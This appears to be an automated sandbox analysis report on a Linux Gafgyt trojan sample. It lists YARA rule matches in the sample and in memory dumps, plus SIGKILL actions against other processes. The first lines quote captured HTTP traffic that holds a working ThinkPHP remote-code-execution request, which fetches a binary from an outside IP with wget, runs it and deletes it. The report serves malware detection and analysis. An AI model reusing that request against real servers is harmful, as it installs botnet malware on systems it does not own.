Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0

System Summary

Malicious sample detected (through community Yara rule)

Source: F00D0B21M4.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: F00D0B21M4.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6203, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6203, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6206, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6206, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6219, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6219, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6220, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: F00D0B21M4.elf PID: 6220, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 6208, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6205, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6211, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6212, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6213, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior

Source: F00D0B21M4.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: F00D0B21M4.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6203, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6203, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6206, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6206, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6213, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6219, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6219, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6220, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: F00D0B21M4.elf PID: 6220, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2180, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2208, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2275, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2281, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2285, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2289, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 2294, result: successful	Jump to behavior
